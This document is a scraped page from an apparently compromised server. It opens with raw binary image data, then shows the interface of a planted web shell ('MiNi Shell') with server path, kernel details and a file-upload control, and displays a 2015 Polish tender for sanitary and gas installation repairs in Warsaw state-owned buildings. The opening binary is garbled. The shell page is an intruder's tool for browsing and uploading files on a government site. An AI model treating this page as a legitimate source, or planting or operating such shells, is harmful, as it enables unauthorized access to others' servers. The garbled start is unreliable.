JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150916/241640-N-2015.html

<p class="kh_header"><b>Warszawa: USŁUGI NAPRAWCZE ORAZ USUWANIE USZKODZEŃ I AWARII W BUDYNKACH ZNAJDUJĄCYCH SIĘ W ZASOBACH SKARBU PAŃSTWA ZARZĄDZANYCH PRZEZ ZARZĄD MIENIA SKARBU PAŃSTWA W ZAKRESIE INSTALACJI SANITARNYCH WODY ZIMNEJ, CIEPŁEJ, KANALIZACJI, CENTRALNEGO OGRZEWANIA I GAZOWEJ w Warszawie</b><br>
<b>Numer ogłoszenia: 241640 - 2015; data zamieszczenia: 16.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Skarbu Państwa , pl. Starynkiewicza 7/9, 02-015 Warszawa, woj. mazowieckie, tel. 22 551 21 00, faks 22 551 21 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zmsp.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI NAPRAWCZE ORAZ USUWANIE USZKODZEŃ I AWARII W BUDYNKACH ZNAJDUJĄCYCH SIĘ W ZASOBACH SKARBU PAŃSTWA ZARZĄDZANYCH PRZEZ ZARZĄD MIENIA SKARBU PAŃSTWA W ZAKRESIE INSTALACJI SANITARNYCH WODY ZIMNEJ, CIEPŁEJ, KANALIZACJI, CENTRALNEGO OGRZEWANIA I GAZOWEJ w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WYKAZ BUDYNKÓW 100% SKARBU PAŃSTWA
						
do wykonywania napraw i usuwania awarii w branży sanitarnej
						
 
L.P.	Dzielnica	Adres	Ilość lok. użytkowych	Ilość lok. mieszkal
nych	VAT	Uwagi
1	Śródmieście	Al.Jerozolimskie  32	3	1	23%	 
2	Mokotów	Antoniewska 3 D		1	8%	 
3	Wesoła	Armi Krajowej 100		6	8%	 
4	Mokotów	Augustówka 4		9	8%	 
5	Mokotów	Belgijska 9 garaż	1		23%	 
6	Praga Północ	Biruty 18		9	8%	 
7	Wawer	Bławatków 11/13		1	8%	 
8	Ursus	Bohaterów Warszawy 31	1		23%	 
9	Mokotów	Bokserska 77	3		23%	 
10	Białołęka	Ciupagi 2 A	1	30	8%	 
11	Białołęka	Ciupagi 2 B	1	28	8%	 
12	Białołęka	Ciupagi 2 C		30	8%	 
13	Białołęka	Ciupagi 2 D		40	8%	 
14	Białołęka	Ciupagi 2 I		24	8%	 
15	Białołęka	Ciupagi 2 II		24	8%	 
16	Białołęka	Ciupagi 2 III	1	19	8%	 
17	Śródmieście	Czerniakowska 128		9	8%	 
18	Włochy	Czereśniowa 53		4	8%	 
19	Białołęka	Fletniowa 47 C		1	8%	 
20	Mokotów	Gierymskiego 1		30	8%	 
21	Włochy	Instalatorów 5	1		23%	 
22	Mokotów	Jadźwingów 18		16	8%	 
23	Śródmieście	Jazdów 10 A	1		23%	 
24	Mokotów	Jarmużowa 4		1	8%	 
25	Mokotów	Klarysewska 57		20	8%	 
26	Mokotów	Kostrzyńska 24		10	8%	 
27	Mokotów	Korkowa 163	1	8	23%	 
28	Żoliborz	Kozietulskiego 4 B		6	8%	 
29	Żoliborz	Koźmiana 8 garaże	5		23%	 
30	Mokotów	Lewicka13/15 garaż	1		23%	 
31	Wawer	Lucerny 106		7	8%	 
32	Śródmieście	Ludna 4	1	31	8%	 
33	Praga Północ	11 Listopada 17/19 bud 3	1		23%	 
34	Włochy	Nike 24		7	8%	 
35	Śródmieście	Nowy Świat 23	1	3	8%	 
36	Mokotów	Olkuska 6		28	8%	 
37	Pr. Południe	Owsiana 14	5		23%	 
38	Wawer	Ptriotów 81	1		23%	 
39	Mokotów	Piramowicza 25		1	8%	 
40	Wawer	Podmokła 4		4	8%	 
41	Śródmieście	Podwale 5		12	8%	 
42	Żoliborz	Powązkowska 80		20	8%	 
43	Mokotów	Powsińska 73		41	8%	 
44	Bemowo	Radiowa 49	7		23%	 
45	Targówek	Radzymińska 105	1	22	8%	 
46	Ursynów	Rydzowa Masilaków	1		23%	 
47	Śródmieście	Senatorska 38	1	2	23%	 
48	Wawer	Skrzyneckiego 16	1		23%	 
49	Wola	Smolki 9		1	8%	 
50	Bemowo	Sosnowiecka 58		1	8%	 
51	Wola	Szańcowa 25	1		23%	 
52	Wawer	Walcownicza 28 C		1	8%	 
53	Mokotów	Willowa 6		5	8%	 
54	Mokotów	Wołoska 26 garaże	16		23%	 
55	Mokotów	Wołoska 26 A garaże	10		23%	 
56	Praga Północ	Wojnicka 2	1		23%	 
57	Śródmieście	Wybrzeże Kościuszkowskie 23	1		23%	 
58	Wola	Złota 70 pawilon	3		23%	 
59	Teren Warszawy 	Lokale S.P. znajdujące się w zasobach Z.M.S.P., w bud. Wspólnotowych i innych administracjach, oraz nieruchomości takie jak kanały, drogi, chodniki, garaże itp.. 				 
 	Razem	 	72	513		 

Zakres prac - instalacji gazowej należący do obowiązków Wykonawcy.

1.	Niezwłoczne wykonywanie napraw i sprawdzanie szczelności w lokalu wynikające z bieżących zgłoszeń.
2.	Kontrola, dociskanie, uszczelnianie lub wymiana kurków gazowych w pomieszczeniach    ogólnych i lokalach (bez urządzeń gazowych w lokalach ).
3.	Wydawanie opinii o stanie urządzeń gazowych takich jak: kuchnie, piece, taborety itp. w pomieszczeniach ogólnych 
i pustostanach.
4.	Zabezpieczanie niesprawnych urządzeń poprzez wyłączenie lub zakorkowanie podejścia w lokalach  i pomieszczeniach ogólnych z zawiadomieniem właściciela urządzenia o konieczności  jego wymiany (pisemnie).
5.	Sprawdzanie i usuwanie nieszczelności armatury w pomieszczeniach ogólnych.
6.	Sprawdzanie i usuwanie nieszczelności złącz rurociągów, reduktorów w pomieszczeniach   ogólnych i lokalach.
7.	Wymiana skorodowanych odcinków przewodów gazowych w lokalu do 10 mb z robotami towarzyszącymi (zamurowanie 
i podmalowanie), z wyłączeniem wymiany pionu lub poziomu.
8.	Sprawdzanie szczelności instalacji gazowej w lokalu.
9.	Sprawdzenie prawidłowości wykonania i połączeń krućców upustowych reduktorów z atmosferą i odwadniaczy.
10.Malowanie uszkodzonej powłoki instalacji gazowej (wraz z jej oczyszczeniem) w przepisowych kolorach, oraz zabezpieczenie instalacji w miejscach kolidujących z instalacją   wod. - kan. - poziomy instalacji w piwnicach ogólnodostępnych.
11.Odłączenie i podłączenie urządzeń gazowych w przypadkach koniecznych (przy prowadzeniu innych robót sanitarnych 
- budowlanych).
12.Oznakowanie miejsc kurków głównych z wywieszeniem informacji w gablocie o ich ilości i usytuowaniu, jak również kurków pomiędzy klatkami schodowymi.
13. Świadczenie usług pogotowia technicznego wraz z usunięciem awarii.

Zakres prac - instalacji zimnej, ciepłej wody należący do obowiązków Wykonawcy.


Zakres obejmuje pomieszczenia od wodomierza do podejścia czerpalnego w lokalu, gdy wodomierz znajduje 
się w budynku, instalacja ciepłej wody od węzła cieplnego.

1.	Uszczelnienie armatury z wymianą uszczelek , wymianą jej elementów takich jak: głowice,
     dławice, pokrętła, korpusy itp.
2.	Wymiana uszczelnień na złączach ( przy mufkach, długich gwintach, łącznikach, śrubunkach, zaworach itp. ).
3.	Wymiana zaworów ( nie nadających się do naprawy ) przelotowych odcinających w poziomach, pionach i lokalach.
4.	Wymiana skorodowanych lub pękniętych łączników instalacji.
5.	Wymiana skorodowanych lub zarośniętych odcinków instalacji: 
     - piony - odcinek o długości max do 10 mb
     - poziomy - odcinek o długości max do 10 mb
6.	Doraźne zabezpieczanie powstałych awarii.
7.	Uzupełnienie lub wymiana uszkodzonych i skorodowanych elementów mocujących instalację lub urządzenia np. haki, wieszaki, wsporniki itp.
8.	Uzupełnienie lub naprawa izolacji zimo ochronnych z wykonaniem zabezpieczenia antykorozyjnego na rurociągu do max 10 mb, rozdzielaczu lub zbiorniku do 1,00 m2
9.	Wykucie i zamurowanie przebić i rozkuć w ścianach, stropach w celu wykonania napraw
10.Okresowe sprawdzanie prawidłowości działania i wskazań urządzeń pomiarowych, oraz urządzeń z nimi współpracujących np. manometry, termometry.
11.Wymiana lub uzupełnienie urządzeń typu: termometry, manometry itp.
12.Demontaż i montaż elementów osłaniających instalację oraz urządzeń sanitarnych celem wykonania naprawy lub wymiany instalacji.
13.Naprawa, uzupełnianie lub wymiana urządzeń i aparatów w pomieszczeniach ogólnych (na polecenie Kierownika )
14.Miejscowe malowanie uszkodzonej powłoki na instalacji i urządzeniach w przepisowych kolorach, max do 10 mb
15.Bieżąca współpraca z obwodem ZEC w sprawie prawidłowego działania węzłów cieplnych.
16. Świadczenie usług pogotowia wraz z usunięciem awarii.

Zakres prac - instalacji kanalizacyjnej należący do obowiązków Wykonawcy.


Zakres obejmuje: podejście odpływowe do przykanalika łącznie ze studzienką.

1.	Uszczelnianie cieknących złącz rur kanalizacyjnych.
2.	Likwidacja przecieków z rur kanalizacyjnych na poziomach, pionach poprzez zakładanie obejm lub uszczelnienie ścianek.
3.	Czyszczenie podejść odpływowych, wpustów ściekowych syfonów, studzienek kanalizacyjnych i rewizji w pomieszczeniach ogólnodostępnych.
4.	Przepychanie pionów kanalizacyjnych i poziomów do studzienki, bez zastosowania sprzętu mechanicznego i wykonywania robót ziemnych.
5.	Udrażnianie, odpowietrzanie pionów kanalizacyjnych.
6.	Uzupełnianie lub wymiana kratek ściekowych w pomieszczeniach, rewizji pionów kanalizacyjnych.
7.	Demontaż i montaż elementów osłaniających instalację oraz urządzeń sanitarnych celem wykonania napraw lub wymiana instalacji.
8.	Wymiana skorodowanej lub uszkodzonej instalacji do max długości 10 mb 
9.	Bieżąca obsługa i wykonywanie napraw zaworów burzowych.
10.Wykucie i zamurowanie przebić i rozkuć w ścianach i stropach w celu wykonania bieżących napraw.
11.Przepychanie wpustów ściekowych studzienek podwórzowych  i rur deszczowych. 
12. Świadczenie usług pogotowia wraz z usunięciem awarii.

Zakres prac - instalacji centralnego ogrzewania należący do obowiązków Wykonawcy.

I. Likwidacja przecieków
1.	Likwidacja przecieków na złączach armatury lub kształtek instalacji z wymianą uszczelek.
2.	Wymiana armatury lub kształtek instalacji (śrubunki, zawory itp.)
3.	Wymiana zużytych części armatury (głowice zaworów, dociski dławic zaworów kołnierzowych itp.).
4.	Likwidacja przecieków na złączach grzejników z wymianą uszczelek a w przypadkach uzasadnionych wymiana grzejników.
5.	Likwidacja przecieków odpowietrzników miejscowych z ewentualną ich wymianą.
6.	Wymiana skorodowanych lub zarośniętych odcinków instalacji o długości max 10 mb (w odcinku ciągłym ).

II. Likwidacja niedogrzewań
1.	Likwidacja niedogrzewań lokalnych powstałych w wyniku zapchania się zaworu lub odcinka instalacji.
2.	Likwidacja lokalnych zakłóceń w dostawie ciepła powstałych w wyniku miejscowego rozregulowania instalacji.
3.	Korekta regulacji z ewentualną wymianą kryz.
4.	Czyszczenie i regulacja armatury (zawory, kształtki).
5.	Uruchomienie i odpowietrzanie instalacji.
6.	Uzupełnianie wody w instalacji.

III. Czynności eksploatacyjne
1.	Sprawdzanie wskazań urządzeń pomiarowych (termometry, manometry) bez zmian parametrów.
2. Naprawa naczyń zbiorczych i zbiorników odpowietrzających np. miejscowe spawanie, wymiana śrub mocujących itp. bez konieczności wymiany naczyń i zbiorników.
3.	Czyszczenie naczyń zbiorczych , zbiorników, odmulaczy i wymienników.
4.	Naprawa lub wymiana odcinków rur przelewowych (bez konieczności wymiany całości 
      do 10 mb
5.	Płukanie instalacji lub grzejników wodą.
6.	Wymiana lub uzupełnienie uszkodzonych lub skorodowanych elementów mocujących instalację lub urządzenia (haki, wieszaki, obejmy, wsporniki).
7.	Miejscowe uzupełnienie uszkodzonej izolacji rurociągów do 1,00 mb oraz innych elementów jak zasobniki, rozdzielacze, naczynia zbiorcze.
8.	Miejscowe malowanie uszkodzonej powłoki rurociągów (bez konieczności malowania całości poziomu lub pionu).

IV. Do całości zakresu
1.	Wykonywanie robót murarskich po prowadzonych robotach.
2.	Współpraca z obwodem ZEC w sprawie prawidłowego działania węzłów cieplnych.
3.  Zlecenia do 1000 zł podpisuje kierownik.
4. Zlecenia powyżej 1000 zł oraz przekraczające zakres robót podpisuje Dyrektor lub jego zastępca.
5.  Pełna konserwacja hydroforów.
6. Pełna konserwacja węzłów CO CCW będących własnością ZMSP, wraz z wymianą urządzeń, osprzętu i regulacją automatyki.
7. Związku z bardzo rozległym terenem prowadzenia prac konserwacyjnych w budynkach zarządzanych przez ZMSP tj. całej Warszawy przy rozliczaniu wykonanych robót należy doliczyć dojazd do miejsca pracy 2 rob/godz.  bez względu na ilość pracowników faktycznie wykonujących roboty.
8. Świadczenie usług pogotowia wraz z usunięciem awarii.

W przypadku nieuzasadnionego spuszczenia wody z całości instalacji budynku przez Wykonawcę, zostanie On obciążony kosztem zużycia wody.

Dokładny opis przedmiotu zamówienia znajduje się w SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.72.00.00-8, 50.72.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia budowlane w branży sanitarnej i gazowej, lub zatrudniają osobę posiadającą takie uprawnienia. Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnymi do wykonania zamówienia, a także zakres wykonywanych przez nich czynności - wg wzoru stanowiącego załącznik nr 7 do SIWZ wraz z dokumentami potwierdzającymi posiadanie co najmniej przez jedną osobę uprawnień sanitarnych i gazowych i wpis na listę Okręgowej Izby Inżynierów.
Do wykazu należy dołączyć kopię uprawnień potrzebnych kwalifikacji niezbędnych do wykonania przedmiotu umowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, należycie wykonali co najmniej 3 zamówienia (bądź są w trakcie ich realizacji) obejmujące usługi o charakterze 
i złożoności podobnej do przedmiotu zamówienia.  Ocena na podstawie wypełnionego załącznika do SIWZ. z podaniem ich wartości oraz daty i miejsca wykonania - wg wzoru stanowiącego załącznik Nr 3 
do SIWZ.
Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane z należytą starannością,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:

a)	Dokument potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym zamówieniem 
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
b)	aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczenie/oświadczenie z właściwego Urzędu Skarbowego potwierdzające, że oferent nie zalega z opłacaniem podatków lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego,
c)	aktualne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczenie/oświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że oferent nie zalega z opłacaniem opłat lub składek na ubezpieczenie społeczne lub że uzyskał zgodę na zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności,
d)	polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony
od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w kwocie min. 50 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - liczba robo-godzin od każdego zlecenia za dojazd bez względu na ilość pracowników wykonujących pracę w niedzielę i święta - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsce Warszawa Pl. Starynkiewicza 7/9 III p. pok. nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2015 godzina 12:00, miejsce: Miejsce Warszawa Pl. Starynkiewicza 7/9 III p. pok. nr 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com